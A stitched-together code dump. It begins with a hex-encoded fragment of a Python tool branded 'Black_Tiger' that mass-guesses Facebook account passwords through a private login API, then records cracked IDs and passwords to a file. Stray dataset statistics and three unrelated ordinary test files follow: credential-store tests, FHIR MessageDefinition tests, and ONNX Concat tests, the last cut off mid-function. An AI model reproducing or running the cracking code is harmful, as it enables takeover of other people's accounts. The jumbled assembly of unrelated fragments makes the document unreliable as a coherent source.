202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39376D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737338202B20275C6E270A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B203D206F70656E28226F75742F73757065725F63702E747874222C20226122290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B2E7772697465282249443A22202B757365722B20222050773A22202B70617373382B225C6E22290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B2E636C6F736528290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B706F696E742E617070656E6428757365722B706173733829202020090A090909090909090909092020202020202020202020202020202020202020202020202020202020202020202020656C73653A09090909090A090909090909090909092020202020202020202020202020202020202020202020202020202020202020202020202020207061737339203D20625B2766697273745F6E616D65275D202B20273738362709090909090A0909090909090909090920202020202020202020202020202020202020202020202020202020202020202020202020202064617461203D2075726C6C69622E75726C6F70656E282268747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3226656D61696C3D222B2875736572292B22266C6F63616C653D656E5F55532670617373776F72643D222B287061737339292B222673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D33663535356639396662363166636437616130633434663538663532326566362229090909090A0909090909090909090920202020202020202020202020202020202020202020202020202020202020202020202020202071203D206A736F6E2E6C6F6164286461746129090909090A09090909090909090909202020202020202020202020202020202020202020202020202020202020202020202020202020696620276163636573735F746F6B656E2720696E20713A09090A090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202078203D2072657175657374732E676574282268747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F222B757365722B223F6163636573735F746F6B656E3D222B715B276163636573735F746F6B656E275D290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207A203D206A736F6E2E6C6F61647328782E74657874290A09090909090909090909092020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39316D5B215D205C7831625B313B39326D5B4F4B5D270909090A09090909090909090909092020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39326D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D0909090A09090909090909090909092020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39336D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B2075736572090A09090909090909090909092020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39346D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737339202B20275C6E270909090A09090909090909090909092020202020202020202020202020202020202020202020202020202020202020202020202020206F6B732E617070656E6428757365722B7061737339290A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020656C73653A0A09090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B226572726F725F6D7367225D3A0A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39316D5B215D205C7831625B313B39366D5B436865636B706F696E745D270A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39326D5B215D205C7831625B313B39376D4E616D65205C7831625B313B39376D202020203A205C7831625B313B39376D27202B20625B276E616D65275D0A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39346D5B215D205C7831625B313B39376D4944205C7831625B313B39376D2020202020203A205C7831625B313B39376D27202B20757365720A090909092020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39346D5B215D205C7831625B313B39316D50617373776F7264205C7831625B313B39376D3A205C7831625B313B39376D27202B207061737339202B20275C6E270A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B203D206F70656E28226F75742F73757065725F63702E747874222C20226122290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B2E7772697465282249443A22202B757365722B20222050773A22202B70617373392B225C6E22290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B2E636C6F736528290A0909090920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202063656B706F696E742E617070656E6428757365722B70617373392909090A09090909090909090909090909090909090A0909090909090909090909090909090A09096578636570743A0A090909706173730A09090A0970203D20546872656164506F6F6C283330290A09702E6D6170286D61696E2C206964290A234465763A426C61636B54696765722D4572726F723430340A20202020202020207072696E7420225C3033335B313B39376DE280A22D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D5C3033335B313B33376D426C61636B5F54696765725C3033335B313B39376D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2DE280A2220A097072696E7420275C3033335B313B39376D5B2B5D5C3033335B313B34376D205C3033335B313B33316D50726F6365737320486173204265656E20436F6D706C657465645C3033335B313B306D270A097072696E74225C3033335B313B39376D5B2B5D5C3033335B313B39376D546F74616C205C3033335B313B39376D4F4B2F5C7831625B313B39376D4350205C3033335B313B39376D3A205C3033335B313B39376D222B737472286C656E286F6B7329292B225C3033335B313B39376D2F5C3033335B313B39376D222B737472286C656E2863656B706F696E7429290A097072696E7420225C3033335B313B39376DC2AB2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D5C3033335B313B33376D426C61636B5F54696765725C3033335B313B39376D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2DC2BB220A097072696E74202222220A205C3033335B313B39376D0A5C3033335B313B39376D20E29688E29688E29688E29688E29688E29688E295972020E29688E29688E29688E29688E29688E29688E295972020E29688E29688E29688E29688E29688E295972020202020E29688E29688E295972020202020E29688E29688E29597202020E29688E29688E2959720E29688E29688E29688E29688E29688E29688E29597E29688E29688E295972020E29688E29688E295970A5C3033335B313B39376DE29688E29688E29594E29590E29590E29590E29590E2959D20E29688E29688E29594E29590E29590E29590E29688E29688E29597E29688E29688E29594E29590E29590E29688E29688E2959720202020E29688E29688E295912020202020E29688E29688E29591202020E29688E29688E29591E29688E29688E29594E29590E29590E29590E29590E2959DE29688E29688E2959120E29688E29688E29594E2959D0A5C3033335B313B39376DE29688E29688E295912020E29688E29688E29688E29597E29688E29688E29591202020E29688E29688E29591E2959AE29688E29688E29688E29688E29688E29594E2959D20202020E29688E29688E295912020202020E29688E29688E29591202020E29688E29688E29591E29688E29688E295912020202020E29688E29688E29688E29688E29688E29594E2959D200A5C3033335B313B39376DE29688E29688E29591202020E29688E29688E29591E29688E29688E29591202020E29688E29688E29591E29688E29688E29594E29590E29590E29688E29688E2959720202020E29688E29688E295912020202020E29688E29688E29591202020E29688E29688E29591E29688E29688E295912020202020E29688E29688E29594E29590E29688E29688E29597200A5C3033335B313B39376DE2959AE29688E29688E29688E29688E29688E29688E29594E2959DE2959AE29688E29688E29688E29688E29688E29688E29594E2959DE2959AE29688E29688E29688E29688E29688E29594E2959D20202020E29688E29688E29688E29688E29688E29688E29688E29597E2959AE29688E29688E29688E29688E29688E29688E29594E2959DE2959AE29688E29688E29688E29688E29688E29688E29597E29688E29688E295912020E29688E29688E295970A5C3033335B313B39376D20E2959AE29590E29590E29590E29590E29590E2959D2020E2959AE29590E29590E29590E29590E29590E2959D2020E2959AE29590E29590E29590E29590E2959D2020202020E2959AE29590E29590E29590E29590E29590E29590E2959D20E2959AE29590E29590E29590E29590E29590E2959D2020E2959AE29590E29590E29590E29590E29590E2959DE2959AE29590E2959D2020E2959AE29590E2959D0A20202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A5C3033335B313B39316D20E29688E29688E29688E29688E29688E29688E2959720E29688E29688E29688E29688E29688E29688E295972020E29688E29688E29688E29688E29688E29688E2959720E29688E29688E29688E29688E29688E29688E2959720E29688E29688E29688E29688E29688E29688E29688E29597E29688E29688E29688E29688E29688E29688E2959720E29688E29688E29688E29688E29688E29688E2959720E29688E29688E29688E29688E29688E29688E29688E2959720E29688E29688E2959720E29688E29688E29597E29688E29688E295972020E29688E29688E295970A5C3033335B313B39326DE29688E29688E29594E29590E29688E29688E29688E29688E29597E2959AE29590E29590E29590E29590E29688E29688E29597E29688E29688E29594E29590E29688E29688E29688E29688E29597E2959AE29590E29590E29590E29590E29688E29688E29597E2959AE29590E29590E29590E29590E29688E29688E29591E2959AE29590E29590E29590E29590E29688E29688E29597E2959AE29590E29590E29590E29590E29688E29688E29597E29688E29688E29594E29590E29590E29590E29590E2959DE29688E29688E29688E29591E29688E29688E29688E29591E29688E29688E295912020E29688E29688E295910A5C3033335B313B39336DE29688E29688E29591E29688E29688E29594E29688E29688E2959120E29688E29688E29688E29688E29688E29594E2959DE29688E29688E29591E29688E29688E29594E29688E29688E2959120E29688E29688E29688E29688E29688E29594E2959D20202020E29688E29688E29594E2959D20E29688E29688E29688E29688E29688E29594E2959D20E29688E29688E29688E29688E29688E29594E2959DE29688E29688E29688E29688E29688E29688E29688E29597E2959AE29688E29688E29591E2959AE29688E29688E29591E29688E29688E29688E29688E29688E29688E29688E295910A5C3033335B313B39346DE29688E29688E29688E29688E29594E2959DE29688E29688E2959120E2959AE29590E29590E29590E29688E29688E29597E29688E29688E29688E29688E29594E2959DE29688E29688E2959120E2959AE29590E29590E29590E29688E29688E29597202020E29688E29688E29594E2959D2020E2959AE29590E29590E29590E29688E29688E2959720E2959AE29590E29590E29590E29688E29688E29597E2959AE29590E29590E29590E29590E29688E29688E2959120E29688E29688E2959120E29688E29688E29591E2959AE29590E29590E29590E29590E29688E29688E295910A5C3033335B313B39356DE2959AE29688E29688E29688E29688E29688E29688E29594E2959DE29688E29688E29688E29688E29688E29688E29594E2959DE2959AE29688E29688E29688E29688E29688E29688E29594E2959DE29688E29688E29688E29688E29688E29688E29594E2959D202020E29688E29688E295912020E29688E29688E29688E29688E29688E29688E29594E2959DE29688E29688E29688E29688E29688E29688E29594E2959DE29688E29688E29688E29688E29688E29688E29688E2959120E29688E29688E2959120E29688E29688E295912020202020E29688E29688E295910A5C3033335B313B39366D20E2959AE29590E29590E29590E29590E29590E2959D20E2959AE29590E29590E29590E29590E29590E2959D2020E2959AE29590E29590E29590E29590E29590E2959D20E2959AE29590E29590E29590E29590E29590E2959D20202020E2959AE29590E2959D2020E2959AE29590E29590E29590E29590E29590E2959D20E2959AE29590E29590E29590E29590E29590E2959D20E2959AE29590E29590E29590E29590E29590E29590E2959D20E2959AE29590E2959D20E2959AE29590E2959D2020202020E2959AE29590E2959D2020202020200A2222220A097072696E7420225C3033335B313B39376DC2AB2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D5C3033335B313B33376D426C61636B5F54696765725C3033335B313B39376D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2DC2BB220A097261775F696E70757428225C6E5C3033335B313B39376D5B2B5D5C3033335B313B39376D4261636B22290A096D656E7528290A0A6966205F5F6E616D655F5F203D3D20275F5F6D61696E5F5F273A0A096C6F67696E28290A67696E28290A'))
| 30,685
| 92,040
| 0.999891
| 6
| 92,055
| 15,340.833333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.871594
| 0.000033
| 92,055
| 2
| 92,041
| 46,027.5
| 0.12833
| 0
| 0
| 0
| 0
| 0
| 0.999555
| 0.999555
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 12
|
67aa5ec955a22fe30621f9fb949b1f49c00f9857
| 3,904
|
py
|
Python
|
test/test_credentials.py
|
Zoltan93/bcr-api
|
f21dfa0c73879a476b29e640f1af2aeea564afaa
|
[
"MIT"
] | 10
|
2020-11-06T04:32:37.000Z
|
2022-01-09T01:57:29.000Z
|
test/test_credentials.py
|
Zoltan93/bcr-api
|
f21dfa0c73879a476b29e640f1af2aeea564afaa
|
[
"MIT"
] | 17
|
2020-02-24T15:09:28.000Z
|
2022-02-14T09:31:55.000Z
|
test/test_credentials.py
|
Zoltan93/bcr-api
|
f21dfa0c73879a476b29e640f1af2aeea564afaa
|
[
"MIT"
] | 23
|
2020-02-03T15:50:32.000Z
|
2021-07-20T21:16:05.000Z
|
# coding=utf-8
import tempfile
import unittest
from pathlib import Path
from bcr_api.credentials import CredentialsStore
ACCESS_TOKEN = "00000000-0000-0000-0000-000000000000"
class TestCredentialsStore(unittest.TestCase):
def with_credential_store(function):
def wrapper(self):
with tempfile.TemporaryDirectory() as temp_dir:
token_path = Path(temp_dir) / "tokens.txt"
store = CredentialsStore(credentials_path=token_path)
function(self, store)
return wrapper
@with_credential_store
def test_file_created_on_read(self, store):
self.assertFalse(store._credentials_path.exists())
_ = [c for c in store]
self.assertTrue(store._credentials_path.exists())
@with_credential_store
def test_file_created_on_write(self, store):
self.assertFalse(store._credentials_path.exists())
store["example@example.com"] = ACCESS_TOKEN
self.assertTrue(store._credentials_path.exists())
@with_credential_store
def test_store(self, store):
self.assertEqual(len(store), 0)
store["example@example.com"] = ACCESS_TOKEN
self.assertEqual(store["example@example.com"], ACCESS_TOKEN)
self.assertEqual(len(store), 1)
@with_credential_store
def test_store_multiple(self, store):
self.assertEqual(len(store), 0)
store["example@example.com"] = "10000000-0000-0000-0000-000000000000"
store["another-example@example.com"] = "20000000-0000-0000-0000-000000000000"
self.assertEqual(
store["example@example.com"], "10000000-0000-0000-0000-000000000000"
)
self.assertEqual(
store["another-example@example.com"], "20000000-0000-0000-0000-000000000000"
)
self.assertEqual(len(store), 2)
@with_credential_store
def test_store_overwrite(self, store):
self.assertEqual(len(store), 0)
store["example@example.com"] = "10000000-0000-0000-0000-000000000000"
store["example@example.com"] = "20000000-0000-0000-0000-000000000000"
self.assertEqual(
store["example@example.com"], "20000000-0000-0000-0000-000000000000"
)
@with_credential_store
def test_store_same(self, store):
self.assertEqual(len(store), 0)
store["example@example.com"] = ACCESS_TOKEN
store["example@example.com"] = ACCESS_TOKEN
self.assertEqual(store["example@example.com"], ACCESS_TOKEN)
@with_credential_store
def test_store_case_insensitive(self, store):
store["example@example.com"] = ACCESS_TOKEN
store["EXAMPLE@EXAMPLE.COM"] = ACCESS_TOKEN
store["eXaMpLe@ExAmPlE.cOm"] = ACCESS_TOKEN
self.assertEqual(len(store), 1)
@with_credential_store
def test_store_lower(self, store):
store["example@example.com"] = ACCESS_TOKEN
self.assertEqual(store["example@example.com"], ACCESS_TOKEN)
@with_credential_store
def test_store_upper(self, store):
store["EXAMPLE@EXAMPLE.COM"] = ACCESS_TOKEN
self.assertEqual(store["example@example.com"], ACCESS_TOKEN)
@with_credential_store
def test_store_mixed(self, store):
store["eXaMpLe@ExAmPlE.cOm"] = ACCESS_TOKEN
self.assertEqual(store["example@example.com"], ACCESS_TOKEN)
@with_credential_store
def test_get_lower(self, store):
store["example@example.com"] = ACCESS_TOKEN
self.assertEqual(store["example@example.com"], ACCESS_TOKEN)
@with_credential_store
def test_get_upper(self, store):
store["example@example.com"] = ACCESS_TOKEN
self.assertEqual(store["EXAMPLE@EXAMPLE.COM"], ACCESS_TOKEN)
@with_credential_store
def test_get_mixed(self, store):
store["example@example.com"] = ACCESS_TOKEN
self.assertEqual(store["eXaMpLe@ExAmPlE.cOm"], ACCESS_TOKEN)
| 33.367521
| 88
| 0.682633
| 458
| 3,904
| 5.611354
| 0.144105
| 0.152529
| 0.185214
| 0.222568
| 0.829183
| 0.829183
| 0.803113
| 0.784436
| 0.72179
| 0.696887
| 0
| 0.084751
| 0.2021
| 3,904
| 116
| 89
| 33.655172
| 0.740289
| 0.003074
| 0
| 0.552941
| 0
| 0
| 0.217481
| 0.087918
| 0
| 0
| 0
| 0
| 0.258824
| 1
| 0.176471
| false
| 0
| 0.047059
| 0
| 0.247059
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
db2b3350c02d0e89aa3ffc7982a6c0fd81ea4809
| 8,674
|
py
|
Python
|
fhir/resources/STU3/tests/test_messagedefinition.py
|
cstoltze/fhir.resources
|
52f99738935b7313089d89daf94d73ce7d167c9d
|
[
"BSD-3-Clause"
] | 144
|
2019-05-08T14:24:43.000Z
|
2022-03-30T02:37:11.000Z
|
fhir/resources/STU3/tests/test_messagedefinition.py
|
cstoltze/fhir.resources
|
52f99738935b7313089d89daf94d73ce7d167c9d
|
[
"BSD-3-Clause"
] | 82
|
2019-05-13T17:43:13.000Z
|
2022-03-30T16:45:17.000Z
|
fhir/resources/STU3/tests/test_messagedefinition.py
|
cstoltze/fhir.resources
|
52f99738935b7313089d89daf94d73ce7d167c9d
|
[
"BSD-3-Clause"
] | 48
|
2019-04-04T14:14:53.000Z
|
2022-03-30T06:07:31.000Z
|
# -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/MessageDefinition
Release: STU3
Version: 3.0.2
Revision: 11917
Last updated: 2019-10-24T11:53:00+11:00
"""
from pydantic.validators import bytes_validator # noqa: F401
from .. import fhirtypes # noqa: F401
from .. import messagedefinition
def impl_messagedefinition_1(inst):
assert inst.category == "Notification"
assert inst.contact[0].telecom[0].system == "url"
assert inst.contact[0].telecom[0].value == "http://hl7.org"
assert inst.date == fhirtypes.DateTime.validate("2016-11-09")
assert inst.event.code == "communication-request"
assert inst.event.system == "http://hl7.org/fhir/message-events"
assert inst.experimental is True
assert inst.id == "example"
assert inst.name == "EXAMPLE"
assert inst.publisher == "Health Level Seven, Int'l"
assert (
inst.purpose == "Defines a base example for other MessageDefintion instances."
)
assert inst.responseRequired is False
assert inst.status == "draft"
assert inst.text.div == (
'<div xmlns="http://www.w3.org/1999/xhtml">Message '
"definition base example</div>"
)
assert inst.text.status == "generated"
assert inst.title == "Message definition base example"
assert inst.url == "http://hl7.org/fhir/MessageDefinition/example"
def test_messagedefinition_1(base_settings):
"""No. 1 tests collection for MessageDefinition.
Test File: messagedefinition-example.json
"""
filename = base_settings["unittest_data_dir"] / "messagedefinition-example.json"
inst = messagedefinition.MessageDefinition.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "MessageDefinition" == inst.resource_type
impl_messagedefinition_1(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "MessageDefinition" == data["resourceType"]
inst2 = messagedefinition.MessageDefinition(**data)
impl_messagedefinition_1(inst2)
def impl_messagedefinition_2(inst):
assert (
inst.allowedResponse[0].message.reference
== "MessageDefinition/patient-link-response"
)
assert inst.allowedResponse[0].situation == (
"Optional response message that may provide additional " "information"
)
assert inst.base.reference == "MessageDefinition/example"
assert inst.category == "Notification"
assert inst.contact[0].telecom[0].system == "url"
assert inst.contact[0].telecom[0].value == "http://hl7.org"
assert inst.copyright == "� HL7.org 2011+"
assert inst.date == fhirtypes.DateTime.validate("2017-02-03")
assert inst.description == (
"Notification of two patient records that represent the same "
"individual that require an established linkage."
)
assert inst.event.code == "patient-link"
assert inst.event.system == "http://hl7.org/fhir/message-events"
assert inst.experimental is True
assert inst.focus[0].code == "Patient"
assert inst.focus[0].max == "2"
assert inst.focus[0].min == 2
assert inst.focus[0].profile.reference == "StructureDefinition/example"
assert inst.id == "patient-link-notification"
assert inst.identifier.system == "urn:ietf:rfc:3986"
assert inst.identifier.value == "urn:oid:1.3.6.1.4.1.21367.2005.3.7.9878"
assert inst.jurisdiction[0].coding[0].code == "US"
assert inst.jurisdiction[0].coding[0].display == "United States of America (the)"
assert inst.jurisdiction[0].coding[0].system == "urn:iso:std:iso:3166"
assert inst.name == "PATIENT-LINK-NOTIFICATION"
assert inst.parent[0].reference == "ActivityDefinition/example"
assert inst.publisher == "Health Level Seven, Int'l"
assert inst.purpose == (
"Notifies recipient systems that two patients have been "
"'linked' - meaning they represent the same individual"
)
assert inst.replaces[0].reference == "MessageDefinition/example"
assert inst.responseRequired is False
assert inst.status == "draft"
assert inst.text.div == (
'<div xmlns="http://www.w3.org/1999/xhtml">Link Patients ' "Notification</div>"
)
assert inst.text.status == "generated"
assert inst.title == "Link Patients Notification"
assert inst.url == (
"http://hl7.org/fhir/MessageDefinition/patient-link-" "notification"
)
assert inst.useContext[0].code.code == "focus"
assert inst.useContext[0].code.system == "http://hl7.org/fhir/usage-context-type"
assert inst.useContext[0].valueCodeableConcept.coding[0].code == "positive"
assert (
inst.useContext[0].valueCodeableConcept.coding[0].system
== "http://hl7.org/fhir/variant-state"
)
assert inst.version == "1"
def test_messagedefinition_2(base_settings):
"""No. 2 tests collection for MessageDefinition.
Test File: messagedefinition-patient-link-notification.json
"""
filename = (
base_settings["unittest_data_dir"]
/ "messagedefinition-patient-link-notification.json"
)
inst = messagedefinition.MessageDefinition.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "MessageDefinition" == inst.resource_type
impl_messagedefinition_2(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "MessageDefinition" == data["resourceType"]
inst2 = messagedefinition.MessageDefinition(**data)
impl_messagedefinition_2(inst2)
def impl_messagedefinition_3(inst):
assert inst.base.reference == "MessageDefinition/example"
assert inst.category == "Consequence"
assert inst.contact[0].telecom[0].system == "url"
assert inst.contact[0].telecom[0].value == "http://hl7.org"
assert inst.copyright == "� HL7.org 2011+"
assert inst.date == fhirtypes.DateTime.validate("2017-02-03")
assert inst.description == "Optional response to a patient link notification."
assert inst.event.code == "patient-link"
assert inst.event.system == "http://hl7.org/fhir/message-events"
assert inst.experimental is True
assert inst.focus[0].code == "Patient"
assert inst.focus[0].max == "2"
assert inst.focus[0].min == 2
assert inst.focus[0].profile.reference == "StructureDefinition/example"
assert inst.id == "patient-link-response"
assert inst.identifier.system == "urn:ietf:rfc:3986"
assert inst.identifier.value == "urn:oid:1.3.6.1.4.1.21367.2005.3.7.9879"
assert inst.jurisdiction[0].coding[0].code == "US"
assert inst.jurisdiction[0].coding[0].display == "United States of America (the)"
assert inst.jurisdiction[0].coding[0].system == "urn:iso:std:iso:3166"
assert inst.name == "PATIENT-LINK-RESPONSE"
assert inst.parent[0].reference == "ActivityDefinition/example"
assert inst.publisher == "Health Level Seven, Int'l"
assert inst.purpose == (
"Optional response message that may provide additional "
"information on the outcome of the patient link operation."
)
assert inst.replaces[0].reference == "MessageDefinition/example"
assert inst.responseRequired is False
assert inst.status == "draft"
assert inst.text.div == (
'<div xmlns="http://www.w3.org/1999/xhtml">Link Patients ' "Response</div>"
)
assert inst.text.status == "generated"
assert inst.title == "Link Patients Response"
assert inst.url == "http://hl7.org/fhir/MessageDefinition/patient-link-response"
assert inst.useContext[0].code.code == "focus"
assert inst.useContext[0].code.system == "http://hl7.org/fhir/usage-context-type"
assert inst.useContext[0].valueCodeableConcept.coding[0].code == "positive"
assert (
inst.useContext[0].valueCodeableConcept.coding[0].system
== "http://hl7.org/fhir/variant-state"
)
assert inst.version == "1"
def test_messagedefinition_3(base_settings):
"""No. 3 tests collection for MessageDefinition.
Test File: messagedefinition-patient-link-response.json
"""
filename = (
base_settings["unittest_data_dir"]
/ "messagedefinition-patient-link-response.json"
)
inst = messagedefinition.MessageDefinition.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "MessageDefinition" == inst.resource_type
impl_messagedefinition_3(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "MessageDefinition" == data["resourceType"]
inst2 = messagedefinition.MessageDefinition(**data)
impl_messagedefinition_3(inst2)
| 41.304762
| 87
| 0.694028
| 1,051
| 8,674
| 5.686013
| 0.189343
| 0.152276
| 0.023427
| 0.02577
| 0.836345
| 0.817102
| 0.803213
| 0.793173
| 0.757028
| 0.70666
| 0.000231
| 0.03278
| 0.173507
| 8,674
| 209
| 88
| 41.502392
| 0.80053
| 0.079202
| 0
| 0.580838
| 0
| 0.011976
| 0.315935
| 0.070348
| 0
| 0
| 0
| 0
| 0.580838
| 1
| 0.035928
| false
| 0
| 0.017964
| 0
| 0.053892
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
db2d04d8c07825d87e5322134be89d6cd930c973
| 6,025
|
py
|
Python
|
tests/unit_tests/test_nn/test_converters/test_onnx/test_Concat.py
|
samysweb/dnnv
|
58fb95b7300914d9da28eed86c39eca473b1aaef
|
[
"MIT"
] | 5
|
2022-01-28T20:30:34.000Z
|
2022-03-17T09:26:52.000Z
|
tests/unit_tests/test_nn/test_converters/test_onnx/test_Concat.py
|
samysweb/dnnv
|
58fb95b7300914d9da28eed86c39eca473b1aaef
|
[
"MIT"
] | 9
|
2022-01-27T03:50:28.000Z
|
2022-02-08T18:42:17.000Z
|
tests/unit_tests/test_nn/test_converters/test_onnx/test_Concat.py
|
samysweb/dnnv
|
58fb95b7300914d9da28eed86c39eca473b1aaef
|
[
"MIT"
] | 2
|
2022-02-03T17:32:43.000Z
|
2022-03-24T16:38:49.000Z
|
import numpy as np
import onnxruntime
from dnnv.nn.converters.onnx import *
from dnnv.nn.operations import *
def test_Concat_consts():
x0 = np.arange(5)
x1 = np.arange(10, 20)
op = Concat([x0, x1], 0)
onnx_model = convert(OperationGraph([op]))
results = onnxruntime.backend.run(onnx_model, [])
assert len(results) == 1
result = results[0]
y = np.array([0, 1, 2, 3, 4, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19])
assert np.all(result == y)
def test_Concat_x0_is_op():
x0 = np.arange(5)
x1 = np.arange(10, 20)
input_op0 = Input((5,), np.dtype(np.int64))
op = Concat([input_op0, x1], 0)
onnx_model = convert(OperationGraph([op]))
results = onnxruntime.backend.run(onnx_model, [x0])
assert len(results) == 1
result = results[0]
y = np.array([0, 1, 2, 3, 4, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19])
assert np.all(result == y)
def test_Concat_x1_is_op():
x0 = np.arange(5)
x1 = np.arange(10, 20)
input_op1 = Input((10,), np.dtype(np.int64))
op = Concat([x0, input_op1], 0)
onnx_model = convert(OperationGraph([op]))
results = onnxruntime.backend.run(onnx_model, [x1])
assert len(results) == 1
result = results[0]
y = np.array([0, 1, 2, 3, 4, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19])
assert np.all(result == y)
def test_Concat_x0_x1_are_op():
x0 = np.arange(5)
x1 = np.arange(10, 20)
input_op0 = Input((5,), np.dtype(np.int64))
input_op1 = Input((10,), np.dtype(np.int64))
op = Concat([input_op0, input_op1], 0)
onnx_model = convert(OperationGraph([op]))
results = onnxruntime.backend.run(onnx_model, [x0, x1])
assert len(results) == 1
result = results[0]
y = np.array([0, 1, 2, 3, 4, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19])
assert np.all(result == y)
def test_Concat_1d():
x0 = np.array([1, 2], dtype=np.float32)
x1 = np.array([3, 4], dtype=np.float32)
op = Concat([x0, x1], 0)
onnx_model = convert(OperationGraph([op]))
results = onnxruntime.backend.run(onnx_model, [])
assert len(results) == 1
result = results[0]
y = np.array([1, 2, 3, 4], dtype=np.float32)
assert np.all(result == y)
op = Concat([x0, x1], -1)
onnx_model = convert(OperationGraph([op]))
results = onnxruntime.backend.run(onnx_model, [])
assert len(results) == 1
result = results[0]
y = np.array([1, 2, 3, 4], dtype=np.float32)
assert np.all(result == y)
def test_Concat_2d():
x0 = np.array([[1, 2], [3, 4]], dtype=np.float32)
x1 = np.array([[5, 6], [7, 8]], dtype=np.float32)
op = Concat([x0, x1], 0)
onnx_model = convert(OperationGraph([op]))
results = onnxruntime.backend.run(onnx_model, [])
assert len(results) == 1
result = results[0]
y = np.array([[1, 2], [3, 4], [5, 6], [7, 8]], dtype=np.float32)
assert np.all(result == y)
op = Concat([x0, x1], 1)
onnx_model = convert(OperationGraph([op]))
results = onnxruntime.backend.run(onnx_model, [])
